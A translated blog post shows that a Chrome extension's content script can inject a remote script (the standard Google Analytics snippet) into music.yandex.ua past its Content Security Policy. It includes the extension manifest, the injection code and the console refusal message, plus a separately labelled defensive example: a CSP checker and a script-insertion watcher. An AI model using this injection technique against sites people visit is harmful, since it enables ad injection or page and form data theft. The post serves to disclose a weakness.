
CSP bypass using Google Chrome extensions

Not so long ago, I set up CSP (Content Security Policy) on my project and decided that life was good. After all, now it is impossible to load scripts from disallowed origins, and I will even be notified with a report about any attempt to do so. And even if someone does manage to load a script, it still will not be able to send anything anywhere, because AJAX requests are only allowed to my own servers.

That is what I thought, and I was at ease for a while.

I also used the HTTP Headers extension, which gave me a convenient view of server response headers. One day I saw an advertisement on my own sites that had never been there before. After looking through the code a bit and experimenting, I realised that it was this extension that was injecting advertising into every site I visited. Unfortunately, I did not save a copy of the extension's code in time, and by now it has been removed from the extension store with the note "contains malicious software". This is where my story starts.

I became very curious how this was possible: I have given the browser clear rules about which scripts may be loaded and where data may be sent from my page, and yet here I see that these security settings do very little to protect users if they use browser extensions (in this case, specifically Google Chrome). So I decided to recreate such an extension, one that could load scripts from a remote server while bypassing the CSP.
Writing browser extensions is not very difficult and there have been many articles about it, in particular from Google, so I will not dwell on the actual writing of the extension.

As an example, the Yandex Music site was chosen for several reasons:


Putting together the malicious extension (the finished version is on GitHub):

1. The manifest.json file


    {
        "manifest_version": 2,
        "name": "CSP vulnerability",
        "description": "This is just an example, please do not use it.",
        "version": "1.0",
        "browser_action": {
            "default_icon": "evil.png",
            "default_popup": "popup.html"
        },
        "content_scripts": [
            {
                "matches": ["https://music.yandex.ua/*"],
                "js": ["evil.js"],
                "run_at": "document_end"
            }
        ],
        "permissions": ["activeTab", "https://music.yandex.ua/*"]
    }

2. Creating the malicious script itself.


Looking carefully at where Yandex allows scripts to be loaded from (the script-src directive of its policy):

    script-src 'self' 'unsafe-eval' vk.com cdn.pushwoosh.com yandex.ua yandex.st yandex.net yastatic.net yandexadexchange.net *.yandex.ru *.yandex.ua *.yandex.net *.yastatic.net *.yandexadexchange.net *.yandex-team.ru

I decided that Google Analytics was clearly missing from this list, so I chose https://google-analytics.com/analytics.js as the script to load, especially since many people regard Google as a "good corporation". This choice was based on the following criteria:

  1. The connected script does not harm anyone.
  2. It definitely works.
  3. It will try to make AJAX requests.
  4. Anyone who wants to can connect it.

This is another bonus, because I can use the loaded script to simulate requests without running my own server or writing additional code (of course, Google Analytics will not let me see the collected data if I am not the site owner, but I did not want to collect any data anyway, just to demonstrate the bypass).

I take the standard snippet from the manual; only the tracking ID is made up:

    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o), m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');

    ga('create', 'UA-00000000-0', 'auto');
    ga('send', 'pageview');

To begin with, I try to execute this snippet from the console to check whether CSP is enforced on this site at all, and I see the following:

 VM636:10 [Report Only] Refused to load the script 'https://www.google-analytics.com/analytics.js' because it violates the following Content Security Policy directive: "script-src 'self' 'unsafe-eval' vk.com cdn.pushwoosh.com yandex.ua yandex.st yandex.net yastatic.net yandexadexchange.net *.yandex.ru *.yandex.ua *.yandex.net *.yastatic.net *.yandexadexchange.net *.yandex-team.ru 'nonce-dWVmJGgsauDNxkDyep5LEg=='". 

Now I add exactly the same code to the extension, and here everything works: the script is successfully added to the page without generating a single error.
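To make the two outcomes above concrete, here is an added example (my own code, not from the article or from the extension on GitHub): a simplified script-src evaluator that reproduces why the console attempt was refused, plus a page-side MutationObserver that reports any <script src> element the page's own policy would not have allowed, which is the one place a site can still notice what an extension's content script appended to its DOM. Assumptions: the page origin is https://music.yandex.ua (taken from the manifest's matches pattern), the function names are mine, the matching rules are a reduced version of CSP3 host-source matching (no 'strict-dynamic', no redirect handling, path matching limited to prefix/exact), and the policy string is the one from the console message.

```javascript
// Added example, not code from the original article or from Yandex.
// A simplified script-src evaluator (host-source, wildcard, scheme and
// port matching; path handling reduced to prefix/exact) and a page-side
// watcher for <script src> elements the page's own policy would refuse.

// The script-src value from the console message in the article.
const YANDEX_SCRIPT_SRC =
  "'self' 'unsafe-eval' vk.com cdn.pushwoosh.com yandex.ua yandex.st " +
  "yandex.net yastatic.net yandexadexchange.net *.yandex.ru *.yandex.ua " +
  "*.yandex.net *.yastatic.net *.yandexadexchange.net *.yandex-team.ru " +
  "'nonce-dWVmJGgsauDNxkDyep5LEg=='";

// Assumed page origin; the article's manifest targets https://music.yandex.ua.
const PAGE_ORIGIN = 'https://music.yandex.ua';

const DEFAULT_PORT = { http: '80', https: '443' };

function parseSourceList(directiveValue) {
  return directiveValue.trim().split(/\s+/).filter(Boolean);
}

// "*.yandex.ru" matches any subdomain but not the bare "yandex.ru".
function hostMatches(pattern, host) {
  pattern = pattern.toLowerCase();
  host = host.toLowerCase();
  return pattern.startsWith('*.') ? host.endsWith(pattern.slice(1)) : pattern === host;
}

function hostSourceMatches(expr, url, pageUrl) {
  const m = /^(?:([a-z][a-z0-9+.\-]*):\/\/)?([^/:]+)(?::(\d+|\*))?(\/.*)?$/i.exec(expr);
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  const urlScheme = url.protocol.slice(0, -1).toLowerCase();
  // A scheme-less source takes the page's scheme; CSP3 also lets an http
  // page's source match https, but never the other way round.
  const wantScheme = (scheme || pageUrl.protocol.slice(0, -1)).toLowerCase();
  if (urlScheme !== wantScheme && !(wantScheme === 'http' && urlScheme === 'https')) return false;
  if (!hostMatches(host, url.hostname)) return false;
  const urlPort = url.port || DEFAULT_PORT[urlScheme] || '';
  if (port === '*') {
    // any port is fine
  } else if (port) {
    if (port !== urlPort) return false;
  } else if (urlPort !== (DEFAULT_PORT[wantScheme] || '')) {
    return false;
  }
  if (path) {
    // A path ending in "/" is a prefix; otherwise it must match exactly.
    if (path.endsWith('/') ? !url.pathname.startsWith(path) : url.pathname !== path) return false;
  }
  return true;
}

// True if script-src would allow fetching scriptUrl from a page at pageOrigin.
function scriptSrcAllows(directiveValue, scriptUrl, pageOrigin) {
  const pageUrl = new URL(pageOrigin);
  const url = new URL(scriptUrl, pageUrl); // resolves "//host/x.js" against the page
  for (const expr of parseSourceList(directiveValue)) {
    if (expr.startsWith("'")) {
      // Only 'self' can allow a URL; nonces and hashes apply to the element,
      // not to the URL, and 'unsafe-eval' has no bearing on fetching.
      if (expr.toLowerCase() === "'self'" && url.origin === pageUrl.origin) return true;
      continue;
    }
    if (hostSourceMatches(expr, url, pageUrl)) return true;
  }
  return false;
}

// Page-side detection: anything that shares the page's DOM (a content script
// included) has to append a <script> element to load a remote file, and the
// page can watch for that. This is a signal, not a control: code with DOM
// access could also disconnect the observer. Browser-only; returns null elsewhere.
function watchForDisallowedScripts(directiveValue, report) {
  if (typeof document === 'undefined' || typeof MutationObserver === 'undefined') return null;
  const observer = new MutationObserver((records) => {
    for (const rec of records) {
      for (const node of rec.addedNodes) {
        if (node.nodeName === 'SCRIPT' && node.src &&
            !scriptSrcAllows(directiveValue, node.src, location.origin)) {
          report(node.src);
        }
      }
    }
  });
  observer.observe(document.documentElement, { childList: true, subtree: true });
  return observer;
}

// Stand-alone check mirroring the article's console experiment (prints false).
console.log(scriptSrcAllows(YANDEX_SCRIPT_SRC, '//www.google-analytics.com/analytics.js', PAGE_ORIGIN));
```

Run under Node the block only exercises the evaluator; in a page, `watchForDisallowedScripts(YANDEX_SCRIPT_SRC, src => navigator.sendBeacon('/csp-extension-report', src))` would forward each offending URL to a reporting endpoint of your choosing (the endpoint name is a placeholder). Note that the watcher deliberately checks the URL rather than the element's nonce, so a script element that an extension decorated with the page's nonce is still reported.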

Findings


Yes, many will say that the choice of extensions is everyone's personal business, and Google blocked the extension fairly quickly (within a week of my noticing that it was spamming me with advertising).

On the other hand, it is not clear how malicious it really was. Let me explain why I consider it malicious: it inserted advertisements for dubious products, linking to even more dubious sites, and unfortunately I do not know whether the extension collected any data from the pages I visited, and if so, which; it could just as easily have collected data from forms or simply from the pages themselves.

My opinion is that if a site tells the browser a policy for handling the page it received, then that policy should be absolute and apply to everything, including extensions. But what do you think?

Source: https://habr.com/ru/post/315608/
